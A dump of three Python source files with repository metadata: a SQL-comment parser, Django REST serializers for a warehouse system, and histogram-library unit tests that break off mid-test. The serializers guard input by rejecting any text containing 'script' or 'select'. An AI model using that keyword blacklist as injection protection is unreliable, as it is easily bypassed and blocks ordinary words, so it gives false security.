] | 1 | 2021-11-03T13:16:32.000Z | 2021-11-03T13:16:32.000Z | voxsql/parser.py | ccortezia/sqlnox | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
] | 1 | 2021-02-05T14:58:49.000Z | 2021-02-11T19:14:37.000Z | voxsql/parser.py | ccortezia/voxsql | c1038359b62057fb67780a7755ef26ad95865686 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import List
from .framer import read_frames, BaseFrame
from .utils import text_block, text_field
from .regexes import (
REGEX_DESCRIPTION,
REGEX_NAME,
REGEX_DIALECT,
REGEX_PARAM,
REGEX_RETMODE,
REGEX_RETVAL,
)
__all__ = ['parse']
# --------------------------------------------------------------------------------------------------
# Public Symbols
# --------------------------------------------------------------------------------------------------
def parse(text):
return [
ParsedFrame.fromdict({
'base': {
'source': frame.source,
'header': frame.header,
'body': frame.body,
},
**_parse_frame(frame)
})
for frame in read_frames(text)
]
# --------------------------------------------------------------------------------------------------
# Local Private Functions
# --------------------------------------------------------------------------------------------------
def _parse_frame(frame):
return dict(
header=_parse_header(frame.header),
body=_parse_body(frame.body),
)
def _parse_header(header_text):
return dict(
source=header_text,
name=_parse_header_name(header_text),
desc=_parse_header_description(header_text),
dialect=_parse_header_dialect(header_text),
params=_parse_header_params(header_text),
retmode=_parse_header_retmode(header_text),
retvals=_parse_header_retval(header_text),
)
def _parse_header_description(header_text):
match = REGEX_DESCRIPTION.match(header_text)
return match and text_block(match.groups()[0])
def _parse_header_name(header_text):
match = REGEX_NAME.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_dialect(header_text):
match = REGEX_DIALECT.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_params(header_text):
return [
{
'source': text_block(match.group()),
'name': text_field(match.groupdict()['name']),
'type': text_field(match.groupdict()['type']),
'desc': text_block(match.groupdict()['desc']),
}
for match in REGEX_PARAM.finditer(header_text)
]
def _parse_header_retmode(header_text):
match = REGEX_RETMODE.search(header_text)
return match and text_field(match.groups()[0])
def _parse_header_retval(header_text):
return [
{
'source': text_block(match.group()),
'name': text_field(match.groupdict()['name']),
'type': text_field(match.groupdict()['type']),
'desc': text_block(match.groupdict()['desc']),
}
for match in REGEX_RETVAL.finditer(header_text)
]
def _parse_body(body_text):
return {'source': text_block(body_text)}
# --------------------------------------------------------------------------------------------------
# Local Data Structures
# --------------------------------------------------------------------------------------------------
@dataclass(frozen=True)
class ParsedFrame:
base: 'BaseFrame'
header: 'ParsedHeader'
body: 'ParsedBody'
@classmethod
def fromdict(self, data):
return ParsedFrame(
base=BaseFrame(**data['base']),
header=ParsedHeader.fromdict(data['header']),
body=ParsedBody(**data['body']),
)
@dataclass(frozen=True)
class ParsedParam:
source: str
name: str
type: str
desc: str
@dataclass(frozen=True)
class ParsedRetval:
source: str
name: str
type: str
desc: str
@dataclass(frozen=True)
class ParsedHeader:
source: str
name: str
desc: str
dialect: str
params: List[ParsedParam]
retmode: str
retvals: List[ParsedRetval]
@classmethod
def fromdict(self, data):
return ParsedHeader(
source=data["source"],
name=data["name"],
desc=data["desc"],
dialect=data["dialect"],
params=[ParsedParam(**_) for _ in data["params"]],
retmode=data["retmode"],
retvals=[ParsedRetval(**_) for _ in data["retvals"]],
)
@dataclass(frozen=True)
class ParsedBody:
source: str
| 25.892857 | 100 | 0.541379 |
794644bfba342d60b2a4f6f05bf2d222bd169bf1 | 7,088 | py | Python | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | asn/serializers.py | chinxianjun2016/GreaterWMS | aacd0e15e0114f103eb57002e93670c008cce63b | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from .models import AsnListModel, AsnDetailModel
from userprofile.models import Users
import re
from rest_framework.exceptions import APIException
def data_validate(data):
script_obj = re.findall(r'script', str(data), re.IGNORECASE)
select_obj = re.findall(r'select', str(data), re.IGNORECASE)
if script_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
elif select_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
else:
return data
def asn_data_validate(data):
script_obj = re.findall(r'script', str(data), re.IGNORECASE)
select_obj = re.findall(r'select', str(data), re.IGNORECASE)
if script_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
elif select_obj:
raise APIException({'detail': 'Bad Data can‘not be store'})
else:
asn_last_code = re.findall(r'\d+', str(data), re.IGNORECASE)
if str(asn_last_code[0]) == '00000001':
data = 'ASN' + '00000001'
else:
data = 'ASN' + str(int(asn_last_code[0]) + 1).zfill(8)
return data
def openid_validate(data):
if Users.objects.filter(openid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
def appid_validate(data):
if Users.objects.filter(appid=data).exists():
return data
else:
raise APIException({'detail': 'User does not exists'})
class ASNListGetSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=True, required=False)
asn_status = serializers.IntegerField(read_only=True, required=False)
supplier = serializers.CharField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = AsnListModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'openid', ]
class ASNListPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
supplier = serializers.CharField(read_only=False, required=False)
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNListPartialUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNListUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[asn_data_validate])
class Meta:
model = AsnListModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailGetSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=True, required=False)
supplier = serializers.CharField(read_only=True, required=False)
goods_code = serializers.CharField(read_only=True, required=False)
goods_qty = serializers.IntegerField(read_only=True, required=False)
goods_actual_qty = serializers.IntegerField(read_only=True, required=False)
sorted_qty = serializers.IntegerField(read_only=True, required=False)
goods_shortage_qty = serializers.IntegerField(read_only=True, required=False)
goods_more_qty = serializers.IntegerField(read_only=True, required=False)
goods_damage_qty = serializers.IntegerField(read_only=True, required=False)
creater = serializers.CharField(read_only=True, required=False)
create_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
update_time = serializers.DateTimeField(read_only=True, format='%Y-%m-%d %H:%M:%S')
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'openid']
class ASNDetailPostSerializer(serializers.ModelSerializer):
openid = serializers.CharField(read_only=False, required=False, validators=[openid_validate])
asn_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=True, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class ASNDetailPartialUpdateSerializer(serializers.ModelSerializer):
asn_code = serializers.CharField(read_only=False, required=False, validators=[data_validate])
supplier = serializers.CharField(read_only=False, required=False, validators=[data_validate])
goods_code = serializers.CharField(read_only=False, required=False, validators=[data_validate])
goods_qty = serializers.IntegerField(read_only=False, required=False, validators=[data_validate])
creater = serializers.CharField(read_only=False, required=False, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
class MoveToBinSerializer(serializers.ModelSerializer):
bin_name = serializers.CharField(read_only=False, required=True, validators=[data_validate])
qty = serializers.IntegerField(read_only=False, required=True, validators=[data_validate])
class Meta:
model = AsnDetailModel
exclude = ['openid', 'is_delete', ]
read_only_fields = ['id', 'create_time', 'update_time', ]
| 50.628571 | 101 | 0.724464 |
794645faf5370563445912c1608de9b100a62b6f | 52,091 | py | Python | python/tests/test_validity.py | HDembinski/aghast | f3d45a6960033f48fb8f6b7e906cb36b9d9d8e95 | [
"BSD-3-Clause"
] | 18 | 2019-04-15T14:39:35.000Z | 2021-12-21T15:01:02.000Z | python/tests/test_validity.py | HDembinski/aghast | f3d45a6960033f48fb8f6b7e906cb36b9d9d8e95 | [
"BSD-3-Clause"
] | 27 | 2019-04-12T20:24:00.000Z | 2021-12-03T08:51:56.000Z | python/tests/test_validity.py | diana-hep/stagg | ed97e9abc870e729d300622253aa7e9c870f77ec | [
"BSD-3-Clause"
] | 11 | 2019-04-15T14:41:00.000Z | 2021-11-16T13:28:10.000Z | #!/usr/bin/env python
# BSD 3-Clause License; see https://github.com/scikit-hep/aghast/blob/master/LICENSE
import unittest
import numpy
from aghast import *
class Test(unittest.TestCase):
def runTest(self):
pass
def test_validity_Metadata(self):
h = Collection(
{}, metadata=Metadata("""{"one": 1, "two": 2}""", language=Metadata.json)
)
h.checkvalid()
assert h.metadata.data == """{"one": 1, "two": 2}"""
assert h.metadata.language == Metadata.json
def test_validity_Decoration(self):
h = Collection(
{},
decoration=Decoration("""points { color: red }""", language=Decoration.css),
)
h.checkvalid()
assert h.decoration.data == """points { color: red }"""
assert h.decoration.css == Decoration.css
def test_validity_RawInlineBuffer(self):
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawInlineBuffer(
numpy.zeros(1, dtype=numpy.int32)
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert len(h.instances[0].chunks[0].column_chunks[0].pages[0].array) == 1
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [5]
def test_validity_RawExternalBuffer(self):
buf = numpy.zeros(1, dtype=numpy.int32)
h = Ntuple(
[Column("one", Column.int32)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawExternalBuffer(
buf.ctypes.data, buf.nbytes
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert len(h.instances[0].chunks[0].column_chunks[0].pages[0].array) == 1
buf = numpy.array([3.14], dtype=numpy.float64)
h = Ntuple(
[Column("one", Column.float64)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[
Page(
RawExternalBuffer(
buf.ctypes.data, buf.nbytes
)
)
],
[0, 1],
)
]
)
]
)
],
)
h.checkvalid()
assert h.instances[0].chunks[0].column_chunks[0].pages[0].array.tolist() == [
3.14
]
def test_validity_InterpretedInlineBuffer(self):
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
numpy.zeros(1, dtype=numpy.int32), dtype=InterpretedInlineBuffer.int32
),
)
h.checkvalid()
assert h.values.array.tolist() == [0]
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedInlineBuffer(
b"\x07\x00\x00\x00", dtype=InterpretedInlineBuffer.int32
),
)
h.checkvalid()
assert h.values.array.tolist() == [7]
def test_validity_InterpretedExternalBuffer(self):
buf = numpy.zeros(1, dtype=numpy.float64)
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedExternalBuffer(
buf.ctypes.data, buf.nbytes, dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
buf = numpy.array([3.14], dtype=numpy.float64)
h = BinnedEvaluatedFunction(
[Axis()],
InterpretedExternalBuffer(
buf.ctypes.data, buf.nbytes, dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [3.14]
def test_validity_IntegerBinning(self):
h = BinnedEvaluatedFunction(
[Axis(IntegerBinning(10, 20))],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
h = BinnedEvaluatedFunction(
[Axis(IntegerBinning(20, 10))],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
assert not h.isvalid
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.nonexistent,
loc_overflow=IntegerBinning.nonexistent,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.below1,
loc_overflow=IntegerBinning.nonexistent,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.nonexistent,
loc_overflow=IntegerBinning.above1,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
IntegerBinning(
10,
20,
loc_underflow=IntegerBinning.below1,
loc_overflow=IntegerBinning.above1,
)
)
],
InterpretedInlineBuffer(
numpy.zeros(13), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 13
def test_validity_RealInterval(self):
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(5, -5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
assert not h.isvalid
def test_validity_RealOverflow(self):
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 10
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.above1,
loc_nanflow=RealOverflow.nonexistent,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.nonexistent,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.above1,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(11), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 11
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.nonexistent,
loc_nanflow=RealOverflow.above2,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(12), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 12
h = BinnedEvaluatedFunction(
[
Axis(
RegularBinning(
10,
RealInterval(-5, 5),
RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.above2,
loc_nanflow=RealOverflow.above3,
),
)
)
],
InterpretedInlineBuffer(
numpy.zeros(13), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0] * 13
def test_validity_RegularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.zeros(10), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
def test_validity_HexagonalBinning(self):
h = BinnedEvaluatedFunction(
[Axis(HexagonalBinning(3, 5, -5, -4))],
InterpretedInlineBuffer(
numpy.array([[0.0] * 2] * 3), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 2] * 3
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
qoverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 2] * 4), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 2] * 4
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
roverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 3] * 3), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 3] * 3
h = BinnedEvaluatedFunction(
[
Axis(
HexagonalBinning(
3,
5,
-5,
-4,
qoverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
roverflow=RealOverflow(loc_nanflow=RealOverflow.above1),
)
)
],
InterpretedInlineBuffer(
numpy.array([[0.0] * 3] * 4), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [[0.0] * 3] * 4
def test_validity_EdgesBinning(self):
h = BinnedEvaluatedFunction(
[
Axis(
EdgesBinning(
[3.3],
overflow=RealOverflow(
loc_underflow=RealOverflow.above1,
loc_overflow=RealOverflow.above2,
),
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
h = BinnedEvaluatedFunction(
[Axis(EdgesBinning([1.1, 2.2, 3.3]))],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
def test_validity_IrregularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(IrregularBinning([RealInterval(0.5, 1.5)]))],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0]
h = BinnedEvaluatedFunction(
[
Axis(
IrregularBinning(
[
RealInterval(0.5, 1.5),
RealInterval(1.5, 1.5),
RealInterval(0.0, 10.0),
]
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0]
def test_validity_CategoryBinning(self):
h = BinnedEvaluatedFunction(
[Axis(CategoryBinning(["one", "two", "three"]))],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0]
h = BinnedEvaluatedFunction(
[
Axis(
CategoryBinning(
["one", "two", "three"], loc_overflow=CategoryBinning.above1
)
)
],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0, 0.0]
def test_validity_SparseRegularBinning(self):
h = BinnedEvaluatedFunction(
[Axis(SparseRegularBinning([-5, -3, 10, 1000], 0.1))],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0, 0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0, 0.0, 0.0]
def test_validity_FractionBinning(self):
h = BinnedEvaluatedFunction(
[Axis(FractionBinning())],
InterpretedInlineBuffer(
numpy.array([0.0, 0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.values.array.tolist() == [0.0, 0.0]
assert h.axis[0].binning.error_method == FractionBinning.unspecified
h = BinnedEvaluatedFunction(
[Axis(FractionBinning()), Axis(RegularBinning(10, RealInterval(-5, 5)))],
InterpretedInlineBuffer(
numpy.array(
[
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
),
dtype=InterpretedInlineBuffer.float64,
),
)
h.checkvalid()
assert h.values.array.tolist() == [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
h = BinnedEvaluatedFunction(
[Axis(RegularBinning(10, RealInterval(-5, 5))), Axis(FractionBinning())],
InterpretedInlineBuffer(
numpy.array(
[
[
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
]
]
),
dtype=InterpretedInlineBuffer.float64,
),
)
h.checkvalid()
assert h.values.array.tolist() == [
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
[0.0, 0.0],
]
def test_validity_PredicateBinning(self):
h = Histogram(
[Axis(PredicateBinning(["p", "q"]))],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_Assignments(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation(
[
Assignment("x", "1"),
Assignment("y", "2"),
Assignment("z", "3"),
]
)
]
)
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.array([0.0]))),
)
h.checkvalid()
assert h.axis[0].binning.variations[0].assignments[1].expression == "2"
def test_validity_Variation(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation([Assignment("x", "1")]),
Variation([Assignment("x", "2")]),
]
)
)
],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_VariationBinning(self):
h = Histogram(
[
Axis(
VariationBinning(
[
Variation([Assignment("x", "1")]),
Variation([Assignment("x", "2")]),
Variation([Assignment("x", "3")]),
]
)
)
],
UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.array([0.0, 0.0, 0.0]))
),
)
h.checkvalid()
def test_validity_Axis(self):
h = BinnedEvaluatedFunction(
[Axis(expression="x", title="wow")],
InterpretedInlineBuffer(
numpy.array([0.0]), dtype=InterpretedInlineBuffer.float64
),
)
h.checkvalid()
assert h.axis[0].expression == "x"
assert h.values.array.tolist() == [0.0]
def test_validity_UnweightedCounts(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_WeightedCounts(self):
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10)),
sumw2=InterpretedInlineBuffer.fromarray(numpy.arange(10) ** 2),
),
)
h.checkvalid()
h = Histogram(
[Axis(RegularBinning(10, RealInterval(-5, 5)))],
WeightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10)),
sumw2=InterpretedInlineBuffer.fromarray(numpy.arange(10) ** 2),
unweighted=UnweightedCounts(
InterpretedInlineBuffer.fromarray(numpy.arange(10))
),
),
)
h.checkvalid()
def test_validity_StatisticFilter(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
1,
filter=StatisticFilter(excludes_nan=False),
)
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Moments(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
1,
),
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
2,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0,
weightpower=0,
),
Moments(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0,
weightpower=1,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Extremes(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
min=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
)
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
min=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
),
max=Extremes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
),
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Quantiles(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
quantiles=[
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0.25,
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
)
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
0.75,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
quantiles=[
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
weightpower=0,
),
Quantiles(
InterpretedInlineBuffer.fromarray(
numpy.array([0.0])
),
weightpower=1,
),
]
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Modes(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)),
statistics=[
Statistics(
mode=Modes(
InterpretedInlineBuffer.fromarray(numpy.array([0.0]))
)
)
],
)
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(10))),
)
h.checkvalid()
def test_validity_Statistics(self):
h = Histogram(
[
Axis(
RegularBinning(10, RealInterval(-5, 5)), statistics=[Statistics()]
),
Axis(
RegularBinning(10, RealInterval(-5, 5)), statistics=[Statistics()]
),
],
UnweightedCounts(InterpretedInlineBuffer.fromarray(numpy.arange(100))),
)
h.checkvalid()
h = Ntuple(
[Column("one", Column.int32), Column("two", Column.int16)],
[
NtupleInstance(
[
Chunk(
[
ColumnChunk(
[Page(RawInlineBuffer(b"\x05\x00\x00\x00"))], [0, 1]
),
ColumnChunk(
[Page(RawInlineBuffer(b"\x03\x00"))], [0, 1]
),
]
)
]
)
],
column_statistics=[
Statistics(
moments=[
Moments(
InterpretedInlineBuffer.fromarray(numpy.array([0.0])), 1
),
Moments(
InterpretedInlineBuffer.fromarray(numpy.array([0.0])), 2
),
]
)
],
)
h.checkvalid()
def test_validity_Covariance(self):
h = Histogram(
[
